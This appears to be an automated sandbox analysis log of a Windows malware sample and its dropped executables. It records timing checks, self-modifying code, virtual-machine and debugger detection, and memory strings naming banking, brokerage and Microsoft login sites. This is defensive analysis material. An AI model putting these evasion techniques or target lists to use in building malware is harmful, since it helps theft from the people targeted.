Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30A60 second address: 4F30A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30A66 second address: 4F30AA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D124h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FCBACB2D11Ch 0x00000013 adc ecx, 25FBFDB8h 0x00000019 jmp 00007FCBACB2D11Bh 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30B93 second address: 4F30BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FCBAD522AB1h 0x0000000a sbb cx, 2096h 0x0000000f jmp 00007FCBAD522AB1h 0x00000014 popfd 0x00000015 popad 0x00000016 popad 0x00000017 cmp dword ptr [75AB459Ch], 05h 0x0000001e jmp 00007FCBAD522AAEh 0x00000023 je 00007FCC1E0408CEh 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30BE3 second address: 4F30BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30BE7 second address: 4F30BED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30C40 second address: 4F30C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30C44 second address: 4F30C4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30C4A second address: 4F30C7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FCBACB2D11Ah 0x0000000b and ecx, 0499CFD8h 0x00000011 jmp 00007FCBACB2D11Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xor dword ptr [esp], 5AB53124h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30C7C second address: 4F30C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30C80 second address: 4F30C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30C84 second address: 4F30C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30C8A second address: 4F30CA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBACB2D129h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30CA7 second address: 4F30CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30CAB second address: 4F30CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FCC1D651FD5h 0x0000000d push 75A52B70h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [75AB4538h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30CBD second address: 4F30CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AB4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30CD6 second address: 4F30D12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FCBACB2D120h 0x00000014 or si, D628h 0x00000019 jmp 00007FCBACB2D11Bh 0x0000001e popfd 0x0000001f mov esi, 46D0FF1Fh 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30D12 second address: 4F30D24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [ebp-1Ch], esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov dl, 88h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F30D3C second address: 4F30DA7 instructions: 0x00000000 rdtsc 0x00000002 mov ah, bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test al, al 0x00000009 jmp 00007FCBACB2D120h 0x0000000e je 00007FCC1D640D46h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FCBACB2D11Dh 0x0000001d or si, 4906h 0x00000022 jmp 00007FCBACB2D121h 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007FCBACB2D120h 0x0000002e sbb ecx, 5BE8BFA8h 0x00000034 jmp 00007FCBACB2D11Bh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40985 second address: 4F409E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FCBAD522AAFh 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FCBAD522AB9h 0x0000000f jmp 00007FCBAD522AABh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, esi 0x00000019 jmp 00007FCBAD522AB6h 0x0000001e push eax 0x0000001f pushad 0x00000020 call 00007FCBAD522AACh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F409E8 second address: 4F409FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBACB2D11Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F409FB second address: 4F40A0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBAD522AAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40A0D second address: 4F40AE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+0Ch] 0x0000000b jmp 00007FCBACB2D127h 0x00000010 test esi, esi 0x00000012 jmp 00007FCBACB2D126h 0x00000017 je 00007FCC1D63AA86h 0x0000001d pushad 0x0000001e mov dx, cx 0x00000021 mov si, F049h 0x00000025 popad 0x00000026 cmp dword ptr [75AB459Ch], 05h 0x0000002d pushad 0x0000002e call 00007FCBACB2D122h 0x00000033 pop edx 0x00000034 pushfd 0x00000035 jmp 00007FCBACB2D11Eh 0x0000003a or si, 11C8h 0x0000003f jmp 00007FCBACB2D11Bh 0x00000044 popfd 0x00000045 popad 0x00000046 je 00007FCC1D652B1Bh 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f pushfd 0x00000050 jmp 00007FCBACB2D11Bh 0x00000055 sub si, 680Eh 0x0000005a jmp 00007FCBACB2D129h 0x0000005f popfd 0x00000060 pushfd 0x00000061 jmp 00007FCBACB2D120h 0x00000066 and si, C688h 0x0000006b jmp 00007FCBACB2D11Bh 0x00000070 popfd 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40AE9 second address: 4F40B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBAD522AB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40B01 second address: 4F40B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40BBA second address: 4F40BCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBAD522AACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40BCA second address: 4F40BCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40BCE second address: 4F40C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a push edi 0x0000000b mov di, cx 0x0000000e pop ecx 0x0000000f jmp 00007FCBAD522AB5h 0x00000014 popad 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FCBAD522AADh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 4F40C03 second address: 4F40C09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C860A4 second address: C860A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C860A8 second address: C860C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FCBACB2D122h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8DCF4 second address: C8DD11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FCBAD522AABh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8DD11 second address: C8DD1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FCBACB2D116h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8DD1B second address: C8DD21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8DD21 second address: C8DD27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8DD27 second address: C8DD2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8E122 second address: C8E137 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D121h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8E137 second address: C8E18F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBAD522AADh 0x0000000b jmp 00007FCBAD522AB3h 0x00000010 jmp 00007FCBAD522AB9h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 jmp 00007FCBAD522AB0h 0x0000001e pop edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8E18F second address: C8E193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8E193 second address: C8E199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8E44A second address: C8E44E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8E44E second address: C8E46E instructions: 0x00000000 rdtsc 0x00000002 je 00007FCBAD522AA6h 0x00000008 jmp 00007FCBAD522AB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe RDTSC instruction interceptor: First address: C8E46E second address: C8E474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Special instruction interceptor: First address: 657B08 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Special instruction interceptor: First address: 657C11 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Special instruction interceptor: First address: 8021DB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Special instruction interceptor: First address: 885A71 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Special instruction interceptor: First address: 8CFC73 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Special instruction interceptor: First address: 8CFB9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Special instruction interceptor: First address: 8CD6BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Special instruction interceptor: First address: AA5D3B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Special instruction interceptor: First address: B13CC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Special instruction interceptor: First address: B13368 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Memory allocated: 51A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Memory allocated: 5330000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Memory allocated: 7330000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Code function: 10_2_00C8E142 rdtsc 10_2_00C8E142
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Code function: 10_2_00CA425C sidt fword ptr [esp-02h] 10_2_00CA425C
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe TID: 4220 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe TID: 2132 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe TID: 6676 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe TID: 4128 Thread sleep time: -38019s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe TID: 2520 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe TID: 1840 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe, HXPC21YC8H3Q6AWWXLQHI1I.exe, 0000000A.00000002.1717268597.0000000000C96000.00000040.00000001.01000000.00000006.sdmp, BGXAMSUR4L24WR8IH77.exe, BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1682683310.0000000000A5B000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: s31ydU1MpQ.exe, s31ydU1MpQ.exe, 00000000.00000003.1367621560.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1480098661.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1564929494.00000000012B5000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1436434228.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341921354.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1436676563.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1564929494.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1415661013.00000000012D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: s31ydU1MpQ.exe, 00000000.00000003.1367931512.0000000005995000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696492231p
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.00000000010B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWM
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.000000000103E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe, 0000000A.00000002.1717268597.0000000000C96000.00000040.00000001.01000000.00000006.sdmp, BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1682683310.0000000000A5B000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: s31ydU1MpQ.exe, 00000000.00000003.1367989688.0000000005988000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Thread information set: HideFromDebugger Jump to behavior
